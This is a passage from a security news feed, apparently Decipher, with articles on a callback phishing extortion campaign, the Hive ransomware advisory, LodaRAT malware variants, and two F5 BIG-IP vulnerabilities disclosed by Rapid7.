Over the five-month period of the campaign, researchers have noted a number of changes to the attacks that show that threat actors are evolving their tactics. The wording in the phishing email body has changed, for instance, in a likely move to avoid email protection platform detection. Also, while the extortion campaign recycled phone numbers in its early iterations, later attacks used unique phone numbers for individual victims.

“These cases show a clear evolution of tactics that suggests the threat actor is continuing to improve the efficiency of their attack,” said researchers. “Cases analyzed at the beginning of the campaign targeted individuals at small- and medium-sized businesses in the legal industry. In contrast, cases later in the campaign indicate a shift in victimology to include individuals at larger targets in the retail sector.”

Other research teams have been tracking this callback phishing campaign. Researchers with the Sygnia Incident Response team in July tied the activity to a threat actor called “Luna Moth,” which emerged in March and has launched various scamming activities that combines corporate data theft with extortion. At the same time, researchers with ADVIntel in August attributed the campaign to Silent Ransom, which they said has ties to the Conti group - but Unit 42 researchers said they cannot confirm this tie at this time and are monitoring closely for attribution.

For threat actors, the callback phishing attack requires significant investment, including setting up fake call centers and unique infrastructure for each victim. However, the leveraging of actual over-the-phone interactions, the lack of malware in the original phishing email and the abuse of legitimate tools make the attack harder to detect and less complex than script-based attacks. Because these types of attacks are so difficult to sniff out, researchers said that “employee cybersecurity awareness training is the first line of defense.”

“Unit 42 expects callback phishing attacks to increase in popularity due to the low per-target cost, low risk of detection and fast monetization,” according to Russo. “While groups that can establish infrastructure to handle inbound calls and identify sensitive data for exfiltration are likely to dominate the threat landscape initially, a low barrier to entry makes it probable that more threat actors will enter the fray.”

<![CDATA[Hive Ransomware Attacks Target FortiOS, Microsoft Exchange Flaws]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/hive-ransomware-attacks-target-fortios-microsoft-exchange-flaws https://duo.com/decipher/hive-ransomware-attacks-target-fortios-microsoft-exchange-flaws

The Hive ransomware has racked up hundreds of critical infrastructure victims, especially healthcare and public health organizations, through phishing emails and the exploitation of known, Fortinet and Microsoft Exchange vulnerabilities, according to a new U.S. government agency cybersecurity advisory.

In the advisory, the FBI, CISA and the Department of Health and Human Services (HHS) said that Hive ransomware actors have victimized over 1,300 companies globally and have received $100 million in ransom payments as of November. Since its discovery in June 2021, Hive has rapidly expanded its reach and has also quickly evolved, as seen in a new variant observed in February that switched from the Go programming language to Rust.

“Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks,” according to the Thursday advisory. "From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH)."

Because the ransomware affiliates deploying Hive rely on differing TTPs, the actors use various methods to gain initial access to victim networks. However, government agencies have mostly observed Hive being spread through phishing emails, exploitation of known vulnerabilities and vulnerable, external-facing remote services like Remote Desktop Protocol (RDP), or virtual private networks (VPN). In some instances the actors have exploited a known, critical improper authentication flaw in Fortinet's FortiOS SSL VPNs (CVE-2020-12812), for example. Hive actors have also exploited various Microsoft Exchange vulnerabilities like a feature bypass flaw (CVE-2021-31207), remote code execution bug (CVE-2021-34473) and privilege escalation issue (CVE-2021-34523).

Hive actors have carried out several anti-detection measures after gaining initial access to victim systems, including terminating processes related to backups and antivirus, removing all volume shadow copy services and deleting Windows event logs.

“Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz,” said researchers. “In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.”

Hive isn’t the only ransomware group to close in on the healthcare sector, which faces unique security issues due to the sensitive nature of critical care offered to patients and personal data involved. The FBI, CISA and HHS also recently warned of a cybercrime group called Daixin Team that has launched ransomware attacks against the healthcare and public health sector since at least June.

In a recent striking example of the impact of cyberattacks on the healthcare sector, systems at CommonSpirit Health, the second-largest non-profit hospital chain in the U.S., were pushed offline after a ransomware attack in early October, causing delays in surgeries and patient care. Government officials during the Aspen Institute Cyber Summit this week pointed to the CommonSpirit Health ransomware attack as an example of ransomware currently being at “unacceptable levels,” despite efforts by both the private and public sectors to help companies with their resilience and go after ransomware syndicates through increased law enforcement activity.

“We’ve only seen the [ransomware] problem get worse,” said Paul Abbate, deputy director with the FBI, during the Aspen Institute Cyber Summit. “It’s a highly profitable enterprise for criminal organizations to go after. We’ve seen a higher volume of ransomware attacks and the financial losses are only increasing as well. We’re going to have to come even closer together in preventing victims from being harmed.”

The FBI, CISA and HHS recommended that healthcare organizations take several measures to protect against ransomware attacks, including remediating known flaws (particularly the ones previously targeted by Hive), enabling multi-factor authentication with strong passwords, closing any unused ports and removing any application “not deemed necessary for day-to-day operations.”

<![CDATA[Decipher Podcast: Source Code 11/18]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/decipher-podcast-source-code-11-18 https://duo.com/decipher/decipher-podcast-source-code-11-18

<![CDATA[LodaRAT Malware Evolves With New Functionalities]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/lodarat-malware-evolves-with-new-functionalities https://duo.com/decipher/lodarat-malware-evolves-with-new-functionalities

The LodaRAT malware - a known remote access trojan with extensive data collection and exfiltration capabilities - has steadily evolved over the years with new functionalities, and the malware is being increasingly deployed alongside other malware families, indicating that the RAT has garnered interest from various threat actors, according to new research.

First discovered in September 2016, the remote access trojan comes with a number of capabilities for spying on victims, such as recording the microphones and webcams of victims’ devices. The RAT, which is written in AutoIT, appears to be distributed by multiple cybercrime groups that have been using it to target numerous verticals.

The malware has continually evolved over the years, improving its espionage capabilities for Android and Windows systems, for instance. On Thursday, researchers said that new LodaRAT variants uncovered in the wild shows more changes to the malware, with the addition of some functionalities and removal of others.

“While some of these changes appear to be purely for an increase in speed and efficiency, or reduction in file size, some changes make Loda a more capable malware,” said researchers with Cisco Talos on Thursday. “Many of the LodaRAT samples we analyzed have removed functionality in some way, which may be the author’s attempt to reduce detection rates.”

The biggest additions to the malware include a function that automatically copies the RAT’s files onto every mounted removable storage device - a capability that required non-automated, individual commands in previous versions of the malware. A LodaRAT variant was also observed using a string encoding algorithm that aims to improve the speed of decoding strings and make execution quicker overall.

Newer variants have also cut out several “dead” - or non-functional - commands from the components of the malware’s code. For instance, these include a function that downloads an x64 SQLite3 DLL - which helps LodaRAT extract data from browser databases - from the official AutoIT website. The download URL here returns a 404 HTTP response, making it a “dead” function and stopping threat groups from successfully executing the function on x64-based targets.

“While some of these changes appear to be purely for an increase in speed and efficiency, or reduction in file size, some changes make Loda a more capable malware."

“As it grows in popularity, it is reasonable to expect additional alterations in future. The ease of access to its source code makes LodaRAT an attractive tool for any threat actor who is interested in its capabilities,” said researchers.

Researchers also found that LodaRAT was increasingly being deployed alongside - or by - various other malware families, indicating interest in the RAT by various other threat groups. For instance, a Neshta binary was seen containing the payloads for both the LodaRAT and the more advanced RedLine information stealer.

Additionally, a previously undocumented variant of VenomRAT, called S500, was observed deploying the malware, for instance. S500, which was first announced in the beginning of April on a seller’s Telegram channel, is a .NET commodity malware that enables threat groups to run hidden desktop environments on infected machines. In an S500 campaign, researchers found LodaRAT being automatically decrypted and dropped on victim systems after execution.

“Although it is a stripped down version of VenomRAT, S500 can still pose a significant threat to an infected host,” said researchers. “Its ability to copy profiles from browsers can lead to serious data and financial loss. As its source code is now publicly available, various threat actors are likely to continue using this variant in the future.”

Researchers said that they expect to see more complex variants of LodaRAT in the future, especially with more threat actors looking to customize the malware.

“In conjunction with the appearance of new variants, it is expected that LodaRAT will continue to be dropped alongside other malware families,” they said. “Being readily available and easy to customize, it has become an attractive tool for some attackers.”

<![CDATA[Code Execution Flaws Found in F5 BIG-IP Appliances]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/code-execution-flaws-found-in-f5-big-ip-appliances https://duo.com/decipher/code-execution-flaws-found-in-f5-big-ip-appliances

Researchers have disclosed two vulnerabilities in the popular F5 BIG-IP appliances, one of which can lead to remote code execution in some instances, and another that can allow code execution for authenticated users. F5 has not released updated software versions to address the flaws, but has developed hotfixes that customers can request.

The two vulnerabilities affect many versions of the F5 appliances, and researchers at Rapid7 discovered them and developed exploitation methods for them. The more serious of the two flaws is a CSRF bug (CVE-2022-41622) in the SOAP API in the BIG-IP software and an attacker could exploit it to gain remote code execution on a target device, with some preexisting conditions.

“F5 Big-IP's SOAP API (the endpoint /iControl/iControlPortal.cgi) does not have cross-site request forgery (CSRF) protection, nor does it require a correct Content-Type or other typical SOAP API protections. Consequently, if a user (who is authenticated to an F5 Big-IP device) visits an attacker-controlled website (or is redirected there via an open redirect or cross-site scripting), an attacker can run arbitrary SOAP commands against the F5 Big-IP SOAP API in the authenticated user's session. That could lead to remote code execution in several different ways,” Ron Bowes of Rapid7 wrote in an explanation of the vulnerabilities.

“The API endpoint for SOAP requests, iControlPortal.cgi, which is accessible at /iControl/iControlPortal.cgi, is a CGI script that is SetUID root — that is, it executes as root. The script authenticates the user via HTTP Basic authentication and accepts XML SOAP requests. The XML API is quite complex with many different API endpoints available to use. We chose the upload_file and create_user_3 endpoints as examples in our PoC, because they demonstrate the impact of the exploit concisely.”

That flaw is not simple to exploit, and Bowes said there are some considerable obstacles, including the fact that an attacker would likely need to bypass the protections of SELinux hardening on the devices, which is no mean feat.

The second vulnerability (CVE-2022-41800) is less serious, but could allow an attacker to run shell commands on a target device under some circumstances. The attacker would need to be authenticated, however, and Bowes said he considers the risk of the bug to be low.

“F5 Big-IP's JSON API includes an administrator-only endpoint that creates an RPM specification file (.rpmspec). That file is consumed by another administrator-only endpoint to create an RPM file. Both endpoints are vulnerable to injection attacks into the RPM spec file, where additional fields could be added to the spec using newlines. Notably, an attacker could add executable shell commands that run when the resultant RPM file is created,” Bowes said.

“This would give authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands using an endpoint that is not designed or documented as having that functionality.”

Both vulnerabilities affect versions 13.x, 14.x, 15.x, 16.x, and 17.x of the F5 BIG-IP software. CVE-2022-41622 also affect versions 7.x and 8.x of the BIG-IQ Centralized Management product. F5 said it is not aware of any exploitation of these flaws at this point.